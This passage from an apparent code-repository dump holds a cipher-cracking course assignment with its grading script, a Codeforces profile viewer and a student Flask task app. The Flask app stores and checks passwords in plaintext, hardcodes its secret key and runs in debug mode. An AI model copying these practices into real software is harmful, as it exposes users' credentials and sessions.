RP<P%|ZX%Z<XL*\\X<Z<Xc<Z<X%Zsc[WPacRZ|7cWcZca6PL*|ZaL<Z<LZO%Z4c<sX%WZXcWZ%a<%[%WZ<X%Zs[%%.ZsLas%cR%WZXP|ZRP<<R%ZOc[C*%ZiLRRL4%WZ<X%ZRPa%Z+c[.%WZO>Z<X%ZaL<sX%|ZPaZ<X%Z[Ls.ZcaWZc<Z<X%Z%aWZLiZP<ZXcWZO*[P%WZXP|Z<[%c|*[%ZP<Z4c|Z<XP|ZPW%cZ<Xc<ZXcWZO[L*\\X<ZWca<|ZOcs.Z<LZ<X%ZsP[s*Rc[Z[Ls.ZLa%Z<XPa\\ZLaR>Z7%[7R%6%WZ%W+LaWZcaWZW%|<[L>%WZXP|Z<X%L[>ZXL4ZsL*RWZ<XP|Z[Ls.Z4XPsXZ4%P\\X%WZ|%y%[cRZ<La|ZXcy%ZO%%aZRPi<%WZ<LZ<XP|Z|7L<Z4P<XL*<Z<X%ZcPWZLiZ+ca>Z+%a|*WW%aR>ZcaZPW%cZiRc|X%WZcs[L||ZXP|Z+PaWZPa|<%cWZLiZ[cP|Pa\\ZP<Z<XL*\\X<ZX%Z<X%>ZXcy%ZRL4%[%WZP<ZcaWZX%Z|7[ca\\Zi[L+Z<X%Z[Ls.ZPaZL[W%[Z<LZPa|7%s<Z<X%ZOc|%ZLaZ4XPsXZP<ZXcWZiL[+%[R>Z|<LLWX%Z|LLaZ7%[s%Py%WZ<Xc<ZcZ|RL7%ZXcWZO%%aZiL[+%WZcaWZ<X%Z[Ls.ZXcWZ|RPWZcRLa\\Z<XP|Z*a<PRZP<Z|<L77%WZc<Z<X%Z|7L<ZP<ZaL4ZLss*7P%WZcZRc[\\%Z|<La%ZXcWZ|%[y%WZc|ZcZ4%W\\%ZiRPa<|ZcaWZ7%OOR%|ZXcWZO%%aZPa|%[<%WZc[L*aWZP<Z|LZc|Z<LZsLas%cRZ<X%ZL[PiPs%Z<XP|Z|7%sP%|ZLiZ+c|La[>ZXcWZO%%aZsLy%[%WZ4P<XZ%c[<XZcaWZ\\[c||ZcaWZ4%%W|ZXcWZ\\[L4aZ<X%[%Z+L||ZXcWZsR*a\\Z<LZ<X%Z|<La%|Z+>[<R%O*|X%|ZXcWZ<c.%aZ[LL<ZcaWZ<X%ZLRWZ[Ls.Z|%%+%WZiP6%WZ<LZ<X%Z%c[<X\n```\n\nThis ciphertext was produced in the following way:\n\n1. A plaintext was chosen consisting only of uppercase alphabetical characters and the space character.\n2. A mapping was chosen at random from the ASCII characters {' ','A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'} into all printable ASCII characters.\n3. Each plaintext character was replaced by its image character under the mapping.\n\nIn case this is confusing, the following simplified example may be helpful. Suppose that the plaintext is \"WHAT ARE YOU SAYING\". We pick a rule of association that maps the plaintext characters to ciphertext characters in the following way:\n\n$A \\rightarrow X$\n\n$B \\rightarrow E$\n\n$C \\rightarrow v$\n\n$D \\rightarrow \\&$\n\n$E \\rightarrow r$\n\n$F \\rightarrow z$\n\n$G \\rightarrow @$\n\n$H \\rightarrow 6$\n\n$I \\rightarrow \\backslash$\n\n$J \\rightarrow 8$\n\n$K \\rightarrow 5$\n\n$L \\rightarrow e$\n\n$M \\rightarrow :$\n\n$N \\rightarrow I$\n\n$O \\rightarrow D$\n\n$P \\rightarrow )$\n\n$Q \\rightarrow Y$\n\n$R \\rightarrow L$\n\n$S \\rightarrow Q$\n\n$T \\rightarrow +$\n\n$U \\rightarrow ``$\n\n$V \\rightarrow \\_$\n\n$W \\rightarrow n$\n\n$X \\rightarrow b$\n\n$Y \\rightarrow \\#$\n\n$Z \\rightarrow <$\n\n$space \\rightarrow \\hat{ }$\n\nThen, under this rule,\n\nENC(\"WHAT ARE YOU SAYING\") = \"`n6X+^XLr^#D\"^QX#\\I@`\"\n\nwhere ENC denotes encryption. You may want to confirm that the first few letters are consistent with the mapping shown above. For instance, it is indeed true that W maps to n, H maps to 6, etc.\n\nThe embedding used in the simple example is not the same embedding that was used to produce the long ciphertext given at the beginning of this project description. Your job is to recover that embedding as well as the unknown plaintext.\n\n---\n\n### Requirements\n\nYour code should meet the following requirements.\n\n1. You can use any of the acceptable programming languages we discussed in class.\n1. Your code must read in input from a file. In other words, you must read in the ciphertext from the file ciphertext.txt. Do not hard code it as a string literal. This is essential because I will test your code on other ciphertexts.\n1. Whatever language you choose, the basename of your solution should be \"sol\". For example, if you use C call your solution `sol.c`, if you use Java then call your solution `sol.java`.\n1. You are free to work in your own IDE, but I would prefer it if you could ensure that all paths are relative, so that the same code works unchanged on cocalc.\n\nIf you would like information about how to compile your code from the command line on cocalc, I would be happy to assist you.\n\n### Input/Output Conditions\n\n#### Corpus cleaner\n\nPlease create a program called `sol_cleaner.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program should open and read in a file named `corpus.txt`. This file should be a large body of work written in English (such as one of the [books freely downloadable from Project Gutenberg](https://www.gutenberg.org/files/2600/2600-0.txt)).\n\nAs output, the program should produce a new file called `corpus_clean.txt` which is similar to the input, except that:\n\n* All characters that are not spaces or alphabetical characters have been filtered out.\n* All alphabetical characters have been capitalized.\n\n\n#### Statistics analyzer (plaintext):\n\nPlease create a program called `sol_sap.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program should open and read in a file named `corpus_clean.txt`, which is the output from `sol_cleaner.ext`. As output it should produce a file called `corpus_freq.txt`, which contains the following. Each row is a pair\n\n```\n<letter>, <rel_freq>\n```\nwhere `letter` is a character occurring in the text and `rel_freq` is the relative frequency of the letter in the corpus. The relative frequency of a letter `c` is defined by:\n\n$$relative\\, frequency\\, of\\, c = \\frac{\\#\\,occurrences\\, of\\, c\\, in\\, corpus}{\\#\\, letters\\, in\\, corpus}$$\n\nNote that this will be a floating point number.\n\nThe letter/frequency pairs should be given in order of descending frequency. For example, the file should roughly look like this.\n\n```\ne, 0.082198\na, 0.050031\n(etc)\nz, 0.003000\n\n```\nI have made up the values in the above table for the sake of example.\n\nIt is possible to implement this algorithm in a way that only makes one pass over the corpus. However, if you prefer to read through the file 27 times, that is feasible.\n\n#### Statistics analyzer (ciphertext)\n\nPlease create a program called `sol_sac.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program should read in the file `ciphertext.txt`. The output should be a file `cipher_freq.txt` which is much like `corpus_freq.txt`, but with ciphertext characters rather than only letters and spaces.\nThis is very similar to the statistical analyzer for the corpus, and you should be able to reuse the code you have from the previous task with very few changes. In fact there is a way to arrange things so that this program is identical to `sol_sap.ext`. (But please hand in two files to make the grading uniform.)\n\n#### Cipher cracker\n\nPlease create a program called `sol_cracker.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program reads in three files: `ciphertext.txt`, `cipher_freq.txt`, and `corpus_freq.txt`.\n\nThe output of this program should be a file called `cracked.txt`. It should be the result of replacing each charact of ciphertext.txt with a capital Roman letter or a space. The correspondnce is given by the files `cipher_freq.txt` and `corpus_freq.txt`. The character in row $i$ of `cipher_freq.txt` should be replaced with the letter (or space) in row $i$ of `corpus_freq.txt`. (Note that for this to work, both `cipher_freq.txt` and `corpus_freq.txt` must be sorted by frequency.)\n\nThe result will probably not be a perfect decrypt, but the output should be close enough to cleartext to repair the remaining problems manually.\n\n#### Manual corrections (optional)\n\nIn this optional part of the project, you should create a file called `sol_corrections.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program should read the file `cracked.txt` as input and output a file called `clear.txt`. The output should be the original plaintext used to produce the ciphertext.\n\nThis program works by making letter substitutions in `cracked.txt` that you observe to be appropriate, treating the remaining work to be done as a recreational [cryptogram](https://en.wikipedia.org/wiki/Cryptogram).\n\n\n---\n\n#### Reports\n\nIn this directory you will see a script called `test.py`. I will use this script, or something like it, to help grade your code. You can execute it from the command line like this:\n\n```\n$ python test.py\n```\n\nDo not type the `$`, that is only in the above to show where the command prompt is. Please let me know if you get strange results.\n\nThe script will produce a file called `Pr\n" }, { "alpha_fraction": 0.6797752976417542, "alphanum_fraction": 0.6853932738304138, "avg_line_length": 11.714285850524902, "blob_id": "08eed13ff7f4ef142dab4aa0c0cd64d2d54812f0", "content_id": "2370dfce45a7263728c1750ab37ea37a91b500fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 178, "license_type": "no_license", "max_line_length": 26, "num_lines": 14, "path": "/Project_1/Final_Files/Project 1.report.md", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "# Assignment Project 1\n\n\n Searching for files: \n\n```\nsol_cleaner found: True\nsol_sap found: True\nsol_sac found: True\nsol_cracker found: True\n``` \n\n---\n### Examining sol_cleaner.\n" }, { "alpha_fraction": 0.6083175539970398, "alphanum_fraction": 0.6124763488769531, "avg_line_length": 32.0625, "blob_id": "7ce08d57fbb640a02a837891b6ea52ab76581a83", "content_id": "d650cf059e12c3b8c8eec27a7622118b42f11422", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2645, "license_type": "no_license", "max_line_length": 141, "num_lines": 80, "path": "/Project_1/Final_Files/test.py", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "import os\n\n\ndef run_c(filename):\n import subprocess\n name,ext = os.path.splitext(filename)\n try:\n assert(ext in ['.c','.cpp','.c++'])\n except:\n print \"Unrecognized extension. File must be .c, .cpp, or .c++. Other filetypes may be supported soon if demand exists.\"\n raise SystemExit(0)\n compiler = \"g++\"\n if ext=='.c':\n compiler = \"gcc\"\n proc = subprocess.Popen(\"/usr/bin/%s %s -lcrypto -lpthread\"%(compiler,filename),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n proc.wait()\n out,err = proc.communicate()\n if err:\n #print repr(err)\n return False,False,repr(err)\n ok = True\n try:\n out = subprocess.check_output(\"./a.out\",shell=True,stderr=subprocess.PIPE)\n except:\n ok = False\n\n return True,ok,out\n\n\n\nimport os\nroot = \"./\"\nassignment = \"Project 1\"\nreport = open(assignment+\".report.md\",\"w\")\npath = root\nfiles = os.listdir(path)\n\nreport.write(\"# Assignment %s\\n\"%assignment)\nreport.write(\"\\n\\n Searching for files: \\n\\n```\\n\")\nbasenames = [\"sol_cleaner\", \"sol_sap\", \"sol_sac\",\"sol_cracker\"]\nfullnames = dict()\nfound_basenames = [False]*len(basenames)\nfor i,n in enumerate(basenames):\n foundling = [f for f in files if f.find(n)==0]\n exists = len(foundling)==1\n found_basenames[i] = exists\n report.write(\"%s found: %s\\n\"%(n,exists))\n if exists:\n fullnames[n]=foundling[0]\n else:\n fullnames[n]=False\nreport.write(\"``` \\n\")\nfor i,n in enumerate(basenames):\n report.write(\"\\n---\\n### Examining %s.\\n\"%basenames[i])\n if found_basenames[i]==False:\n report.write(\"File not found\\n\")\n continue\n before_files = set(os.listdir(path))\n btimes = [os.path.getmtime(path+bf) for bf in sorted(before_files)]\n (compiles,runs,output) = run_c(fullnames[n])\n after_files = set(os.listdir(path))\n atimes = [os.path.getmtime(path+bf) for bf in sorted(before_files)]\n\n modified = [sorted(before_files)[i] for i in range(len(btimes)) if atimes[i]!=btimes[i]]\n modified.remove(\"a.out\")\n new_files = list(after_files.difference(before_files))\n report.write(\"Compiles: %s\\n\\n\"%compiles)\n report.write(\"Runs: %s\\n\\n\"%runs)\n report.write(\"Terminal Output: %s\\n\\n\"%output)\n report.write(\"Produced files: \"+\", \".join(new_files)+\"\\n\\n\")\n report.write(\"Modified files: \"+ \", \".join(modified)+\"\\n\\n\")\n for m in modified:\n f = open(m,\"r\").readlines()\n report.write(\"Excerpt of %s:\\n\\n```\\n\\n\"%m)\n if len(f)==1:\n report.write(f[0][:80])\n else:\n report.writelines(f[:10])\n report.write(\"\\n```\\n\\n---\\n\")\nreport.close()\n" } ]
18
l-yc/codeforces-scrapper
https://github.com/l-yc/codeforces-scrapper
b8f200819616137a7629aa9b54e02eef43218a0f
a6a0b65056c15723eaea919234747756d614b29e
38c00db4acfb6a43a45b2b8846b3ec22ac2eea8a
refs/heads/master
2020-11-28T22:56:37.182304
2019-12-24T13:34:48
2019-12-24T13:34:48
229,942,750
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7083333134651184, "alphanum_fraction": 0.7916666865348816, "avg_line_length": 15, "blob_id": "8a7abc710f01731e24676e80d2ed814102fcd207", "content_id": "65ad24a1797cc801196370559ea890cbe73c0bc0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 48, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/README.md", "repo_name": "l-yc/codeforces-scrapper", "src_encoding": "UTF-8", "text": "# codeforces-scrapper\n\nGoogle Code-in 2019 Task\n" }, { "alpha_fraction": 0.7558139562606812, "alphanum_fraction": 0.7848837375640869, "avg_line_length": 42, "blob_id": "5cc4971f3cda513177c42d4a5a94f25c0a2f725e", "content_id": "871b6ee12f3623649797a1aa9ea0aaaf8c356af1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 172, "license_type": "permissive", "max_line_length": 69, "num_lines": 4, "path": "/build.sh", "repo_name": "l-yc/codeforces-scrapper", "src_encoding": "UTF-8", "text": "#!/bin/sh\ncp codeforces-scrapper.py LICENSE ~/rpmbuild/SOURCES/\nrpmbuild -ba codeforces-scrapper.spec\ncp ~/rpmbuild/RPMS/noarch/codeforces-scrapper-0.1-1.fc29.noarch.rpm .\n" }, { "alpha_fraction": 0.60601407289505, "alphanum_fraction": 0.6128182411193848, "avg_line_length": 34.0461540222168, "blob_id": "084cb8d28fc3aec8052a7b61c306af3cb565a502", "content_id": "07a7786133e8e9003fe9a443faebfe91bb9c63cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4556, "license_type": "permissive", "max_line_length": 115, "num_lines": 130, "path": "/codeforces-scrapper.py", "repo_name": "l-yc/codeforces-scrapper", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom string import Template\nimport requests\nfrom tkinter import *\nfrom tkinter import ttk\nimport io\nfrom PIL import Image, ImageTk\n\n# API interface\nclass ScrapperException(Exception):\n '''raise this when there's a scrapper error'''\n\nclass Scrapper():\n api = Template('https://codeforces.com/api/$methodName')\n\n def __init__(self):\n pass\n\n def fetch_data(self, username):\n response = requests.get(Scrapper.api.substitute(methodName='user.info'), params={ 'handles': username })\n #print(response)\n data = response.json()\n if response and data['status'] == 'OK':\n return data['result'][0] # only take the first user\n else:\n raise ScrapperException('Error: User with the specified username does not exist.')\n\n def fetch_image(self, url):\n response = requests.get(url, stream=True)\n raw_data = response.raw.read()\n image = io.BytesIO(raw_data)\n return image\n\n\n# Tkinter GUI setup\nclass App():\n rating_template = Template('$rating (max: $max_rating)')\n rank_template = Template('$rank (max: $max_rank)')\n\n def __init__(self):\n self.scrapper = Scrapper()\n self.createUI()\n\n def createUI(self):\n self.root = Tk()\n self.root.title('Codeforces')\n\n # search\n self.form = ttk.Frame(self.root, padding=(16,16), borderwidth=8, relief='raised')\n self.form.pack(fill=X, anchor=N, expand=True)\n\n self.username_label = ttk.Label(self.form, text='Search username:')\n self.username_label.pack(side=LEFT, padx=8, pady=8)\n\n self.username = StringVar()\n self.username_entry = ttk.Entry(self.form, width=20, textvariable=self.username)\n self.username_entry.pack(side=LEFT, padx=8, pady=8)\n\n self.search_button = ttk.Button(self.form, text='Go', command=self.search)\n self.search_button.pack(side=RIGHT)\n\n # info\n self.info = ttk.Frame(self.root, padding=(16,16), borderwidth=8, relief='sunken')\n self.info.pack(fill=BOTH, expand=True)\n\n self.error_display = StringVar()\n self.error_label = ttk.Label(self.info, textvariable=self.error_display)\n self.error_label.grid(column=0, row=0, columnspan=2)\n\n self.avatar = None\n self.avatar_label = ttk.Label(self.info, image=self.avatar)\n self.avatar_label.grid(column=0, row=1, rowspan=3, padx=8)\n\n self.handle_display = StringVar()\n self.handle_label = ttk.Label(self.info, textvariable=self.handle_display)\n self.handle_label.grid(column=1, row=1, sticky='w')\n\n self.rating_display = StringVar()\n self.rating_label = ttk.Label(self.info, textvariable=self.rating_display)\n self.rating_label.grid(column=1, row=2, sticky='w')\n\n self.rank_display = StringVar()\n self.rank_label = ttk.Label(self.info, textvariable=self.rank_display)\n self.rank_label.grid(column=1, row=3, sticky='w')\n\n def search(self):\n try:\n data = self.scrapper.fetch_data(self.username.get())\n #print(data)\n self.error = None;\n image = self.scrapper.fetch_image('https:' + data['avatar'])\n self.avatar = ImageTk.PhotoImage(Image.open(image))\n self.handle = data['handle']\n self.rating = data['rating']\n self.rank = data['rank']\n self.max_rating = data['maxRating']\n self.max_rank = data['maxRank'] \n except ScrapperException as e:\n #print(e)\n self.error = e\n except requests.exceptions.ConnectionError as e:\n #print(e)\n self.error = 'Error: You are not connected to the internet.'\n self.updateUI()\n\n def updateUI(self):\n if self.error is None:\n self.error_label.grid_remove()\n self.avatar_label.configure(image=self.avatar)\n self.handle_display.set(self.handle)\n self.rating_display.set(App.rating_template.substitute(rating=self.rating, max_rating=self.max_rating))\n self.rank_display.set(App.rank_template.substitute(rank=self.rank, max_rank=self.max_rank))\n else:\n self.error_display.set(self.error)\n self.error_label.grid()\n self.avatar_label.configure(image='')\n self.handle_display.set('')\n self.rating_display.set('')\n self.rank_display.set('')\n\n def run(self):\n self.root.mainloop()\n\n\ndef main():\n App().run()\n\n\nif __name__ == '__main__':\n main()\n" } ]
3
coderkat/sql---flask
https://github.com/coderkat/sql---flask
7ffac861c092afddb68cee69e246dc26c08034fe
202b7028def487b29e08776cef92f8b9e070f8f0
592299f481f88a604856177ae876334565b6822d
refs/heads/master
2016-09-11T02:28:52.329578
2013-03-27T02:58:48
2013-03-27T02:58:48
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6074766516685486, "alphanum_fraction": 0.6181575655937195, "avg_line_length": 36.5, "blob_id": "c4f943f2c39990edfd865bf0d1d6501d6adc7293", "content_id": "9f23ccb85b79fab3a509c90100be88711af1b143", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 749, "license_type": "no_license", "max_line_length": 97, "num_lines": 20, "path": "/templates/change_task.html", "repo_name": "coderkat/sql---flask", "src_encoding": "UTF-8", "text": "{% extends \"header.html\" %}\n{% block title %}Edit Task{% endblock %}\n\n{% block content %}\t\n\n\t<h1>Edit a task</h1>\n\n<!-- TODO: figure out how to pre-populate fields w/existing values\n -->\t\n \t<form name=\"change_task\" action=\"{{ url_for('save_changes') }}\" method=\"post\">\n \t\tTask id*: <input type=\"text\" value=\"{{ task_id }}\" name=\"task_id\"><br />\n \t\t<!-- Tried disabling this field, got screwy url call -->\n\t\tTask title*: <input type=\"text\" value=\"{{ title}}\" name=\"task_title\"><br />\n\t\tTask description: <input type=\"text\" value=\"{{'description'}}\" name=\"task_description\"><br />\n\t\tTask due date (MM-DD-YY): <input type=\"text\" value=\"{{'03-28-13'}}\" name=\"task_due_date\"><br />\n\t\t<input type=\"submit\" value=\"Change a task\">\n\t</form>\n\n\n{% endblock %}" }, { "alpha_fraction": 0.610909104347229, "alphanum_fraction": 0.6115151643753052, "avg_line_length": 32.67346954345703, "blob_id": "d00c85313f2575eaf7fd1146318bac6b1b73f758", "content_id": "620582b985d2c4cb3aeb3e262de76f61fdee06c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3300, "license_type": "no_license", "max_line_length": 204, "num_lines": 98, "path": "/model.py", "repo_name": "coderkat/sql---flask", "src_encoding": "UTF-8", "text": "import sqlite3\nimport datetime\n\ndef connect_db():\n\treturn sqlite3.connect(\"taskapp.db\")\n\ndef new_user(db, email, password, first_name, last_name):\n c = db.cursor()\n query = \"\"\"INSERT INTO Users VALUES (NULL, ?, ?, ?, ?)\"\"\"\n result = c.execute(query, (email, password, first_name, last_name))\n db.commit()\n return result.lastrowid\n\ndef authenticate(db, username, password):\n c = db.cursor()\n query = \"\"\"SELECT * FROM Users WHERE email = ? AND password = ?\"\"\"\n c.execute(query, (username, password))\n row = c.fetchone()\n if row:\n fields = ['id', 'email', 'password', 'first_name', 'last_name']\n return dict(zip(fields, row)) # this returns a dictionary where the keys are the fields and the values are what's returned from the DB. zip attached two lists together.\n\n return None\n\ndef get_user(db, user_id):\n c = db.cursor()\n user_id = str(user_id)\n query = \"\"\"SELECT * FROM Users WHERE id = ?\"\"\"\n c.execute(query, (user_id))\n row = c.fetchone()\n if row:\n fields = ['id', 'email', 'password', 'first_name', 'last_name']\n return dict(zip(fields, row))\n\n return None\n\ndef new_task(db, title, description, due_date, user_id):\n timestamp = datetime.datetime.today()\n user_id = str(user_id)\n c = db.cursor()\n query = \"\"\"INSERT into Tasks VALUES (NULL, ?, ?, ?, ?, NULL, ?)\"\"\"\n result = c.execute(query, (title, description, timestamp, due_date, user_id))\n db.commit()\n return result.lastrowid\n\ndef change_task(db, task_title, task_description, task_due_date, task_id):\n c = db.cursor()\n query = \"\"\"UPDATE Tasks SET title = ?, description = ?, due_date = ? WHERE id = ?\"\"\"\n c.execute(query, (task_title, task_description, task_due_date, task_id))\n db.commit()\n return\n\ndef complete_task(db, task_id):\n timestamp = datetime.datetime.today()\n task_id = str(task_id)\n c = db.cursor()\n query = \"\"\"UPDATE Tasks SET completed_at = ? WHERE id = ?\"\"\"\n c.execute(query, (timestamp, task_id))\n db.commit()\n return\n\n# get tasks by user or get all tasks by all users\ndef get_tasks(db, user_id): \n c = db.cursor()\n \n if user_id:\n user_id = str(user_id)\n query = \"\"\"SELECT * FROM Tasks WHERE user_id = ?\"\"\"\n c.execute(query, (user_id))\n else:\n query = \"\"\"SELECT * FROM Tasks\"\"\"\n c.execute(query)\n\n rows = c.fetchall()\n\n if rows:\n fields = ['id', 'title', 'description', 'created_at', 'due_date', 'completed_at', 'user_id']\n tasks = []\n for row in rows:\n task = dict(zip(fields, row))\n tasks.append(task) #adds in dictionary as an item in the list, will end up with a list of dictionaries\n\n return tasks #we return a list of dictionaries so that later we can use the keys in the dict as attributes when displaying variables in the HTML templates or just pull values through keys directly\n\n return None\n\n# get single task by task ID\ndef get_task(db, task_id):\n c = db.cursor()\n task_id = str(task_id)\n query = \"\"\"SELECT * FROM Tasks WHERE id = ?\"\"\"\n c.execute(query, (task_id))\n row = c.fetchone()\n if row:\n fields = ['id', 'title', 'description', 'created_at', 'due_date', 'completed_at', 'user_id']\n return dict(zip(fields, row))\n\n return None\n" }, { "alpha_fraction": 0.6937969326972961, "alphanum_fraction": 0.704859733581543, "avg_line_length": 34.654930114746094, "blob_id": "7073525b4551a4d064879addc041c392ee398d4f", "content_id": "7d9efa8dff4c470df0782a3f5b78923a519ed05d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5062, "license_type": "no_license", "max_line_length": 186, "num_lines": 142, "path": "/tipsy.py", "repo_name": "coderkat/sql---flask", "src_encoding": "UTF-8", "text": "from flask import Flask, flash, session, render_template, request, redirect, url_for, g\nimport model # our other Python file that has the SQL query functions\nimport urllib # used for URL encoding\nimport re # to do regex date validation\n\napp = Flask(__name__) # make a new instance of the Flask class\napp.secret_key = 'some_secret'\n\n# function that we can call before each view is executed\[email protected]_request\ndef set_up_db():\n\tg.db = model.connect_db() # global variable, db\n\n# function to close db connection after each view is rendered\[email protected]_request\ndef close_db(e): # e is to allow this function to still be called even if some error happens\n\tg.db.close()\n\n# a decorated function aka a 'view'\[email protected](\"/\") # this is the decorate that tells Flask what URL/route is attached to this index function, i.e. maps URL to function\ndef index():\n\treturn render_template(\"index.html\") # the return value that's sent back to the browser as read from our index html file\n\n# login page\[email protected]('/login')\ndef login():\n\treturn render_template(\"login.html\")\n\n# verifying login credentials\[email protected]('/authenticate', methods=[\"POST\"])\ndef authenticate():\n\temail = request.form['username']\n\tpassword = request.form['password']\n\n\tuser_info = model.authenticate(g.db, email, password)\n\n\t# if credentials are wrong or incomplete\n\tif not user_info:\n\t\tflash(\"Incorrect username or password\")\n\t\treturn redirect(url_for(\"login\"))\n\n\telse: # adding user info into session dictionary to pull out and use later\n\t\tsession['user_id'] = user_info['id']\n\t\tsession['username'] = user_info['email']\n\t\treturn redirect(url_for(\"index\"))\n\[email protected]('/logout')\ndef logout():\n\t# remove existing username from session\n\tsession.pop('username', None)\n\tsession.pop('user_id', None)\n\tflash(\"Successfully logged out!\")\n\treturn redirect(url_for('index'))\n\[email protected](\"/tasks\")\ndef list_tasks():\n\t#TODO: Make another thing that returns everything nessecary for this view, by using a join instead of having python do multiple queries.\n\ttasks_from_db = model.get_tasks(g.db, None) # this returns a list of dictionaries\n\n\tfor dicts in tasks_from_db:\n\t\tfor key in (\"title\", \"description\"):\n\t\t\tdicts[key] = urllib.unquote(dicts[key])\n\n\treturn render_template(\"list_tasks.html\", tasks=tasks_from_db)\n\[email protected](\"/new_task\")\ndef new_tasks():\n\tif 'username' not in session:\n\t\tflash(\"You must be logged in to create a new task for yourself.\")\n\t\treturn redirect(url_for(\"index\"))\n\n\telse:\n\t\treturn render_template(\"new_task.html\")\n\[email protected](\"/save_task\", methods=[\"POST\"]) # this url will respond to posted forms rather than just get url requests\ndef save_task():\n\ttask_title = urllib.quote(request.form['task_title']) # request object representing state of user browser, contents from form are put into dictionary on the 'request' object\n\t# encoding all input\n\n\t# check for title in task form: if none, flash error & redirect\n\tif not task_title:\n\t\tflash(\"You must enter a title for your task\")\n\t\treturn redirect(url_for('new_tasks'))\n\t\n\ttask_description = urllib.quote(request.form['task_description'])\n\t\n\ttask_due_date = urllib.quote(request.form['task_due_date'])\n\t\n\t# using regex to check that date is in format of MM-DD-YY [1-12]-[1-31]-[13-99]\n\tdate_comparison = re.match(r'^((0[0-9])|(1[0-2]))-((0[1-9])|(1|2)[0-9]|(3[0|1]))-((1[3-9])|([2-9][0-9]))', task_due_date)\n\t\n\tif date_comparison:\n\t\t# set new task specific to user_id\n\t\ttask_id = model.new_task(g.db, task_title, task_description, task_due_date, session['user_id'])\n\t\treturn redirect(url_for('list_tasks'))\n\n\telse:\n\t\tflash(\"Your date is not in the right format!\") #flashing system basically makes it possible to record a message at the end of a request and access it next request and only next request\n\t\treturn redirect(url_for('new_tasks'))\n\[email protected](\"/task_complete\", methods=[\"POST\"])\ndef complete_task():\n\ttask_id = request.form['task_id']\n\tmodel.complete_task(g.db, task_id)\n\tflash(\"Marked task #\" + task_id + \" as complete!\")\n\treturn redirect(url_for('list_tasks'))\n\[email protected](\"/change_task/<int:id>\", methods=[\"GET\"])\ndef change_task(id):\n\treturn render_template(\"change_task.html\", task_id=id)\n\n\[email protected](\"/save_changes\", methods=[\"POST\"])\n# TODO: Solve id kerfuffle\ndef save_changes():\n\ttask_title = urllib.quote(request.form['task_title']) \n\n\t# follows formatting for save_task \n\tif not task_title:\n\t\tflash(\"You must enter a title for your task\")\n\t\treturn redirect(url_for('change_task'))\n\t\n\ttask_description = urllib.quote(request.form['task_description'])\n\n\ttask_id = request.form['task_id']\n\n\ttask_due_date = urllib.quote(request.form['task_due_date'])\n\n\tdate_comparison = re.match(r'^((0[0-9])|(1[0-2]))-((0[1-9])|(1|2)[0-9]|(3[0|1]))-((1[3-9])|([2-9][0-9]))', task_due_date)\n\t\n\tif date_comparison:\n\t\ttask_change = model.change_task(g.db, task_title, task_description, task_due_date, task_id)\n \t\treturn redirect(url_for('list_tasks'))\n\n\n\telse:\n\t\tflash(\"Your date is not in the right format!\") \n\t\treturn redirect(url_for('change_task'))\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True) # start server in debug mode" }, { "alpha_fraction": 0.6695966720581055, "alphanum_fraction": 0.6933816075325012, "avg_line_length": 28.769229888916016, "blob_id": "2ff4bb9dc8f786ac7238ae713ca3608140637c0b", "content_id": "ecca01c9c1cd32ef9714c60f20bbc88aa8b1f561", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1934, "license_type": "no_license", "max_line_length": 178, "num_lines": 65, "path": "/notes.txt", "repo_name": "coderkat/sql---flask", "src_encoding": "UTF-8", "text": "DB design:\nUSERS\nid - int (primary key)\nemail - varchar(64)\npassword - varchar(64)\nfirst_name - varchar (64)\nlast_name - varchar (64)\n\nTASKS\nid - int (primary key)\ntitle - varchar(64)\ndescription - varchar(255)\ntitle created_at - datetime\ndue date - datetime\ncompleted_at - datetime\nuser_id - int (foreign key to USERS table)\n\n--------------------------------------------------\nCreate a task title and description\n- figure out how to sanitize data (URL encode) -- done!\n- require that date be in a certain format --done!\n- success msg then redirect to all tasks view OR error message of what's missing and go back to new task page -- done!!\n- create task assigned to logged in user -- done!\n\n- clean up URLs with url_for -- done!\n- reduce db call repetition -- done!\n\nEdit tasks\n- mark tasks as complete -- done!\n- change title, description, due date of task after creation\n\t(\"edit\" button on /tasks page, pulls up new page with pre-filled form for task selected: user can edit fields, \"submit\" button, alters task in sql (hang on to taskID somewhere))\n- delete tasks\n//\n- can't edit other people's tasks in any way\n- be able to only mark your own tasks as complete\n\nHomepage\n- log in as user (forms, sessions) OR just browse publicly --done!\n- Page to create new users\n- view all users of app\n\nOptions for Task List view\n- view only your tasks (includes private assigned to you)\n- view all tasks/users (except private tasks)\n- view tasks by user (search by username)\n- view tasks by status (completed or not) \"split completed tasks off from incomplete tasks (Jinja templates)\"\"\n\n\nSet task as private or public\n- new column in Tasks table\n- add to task creation 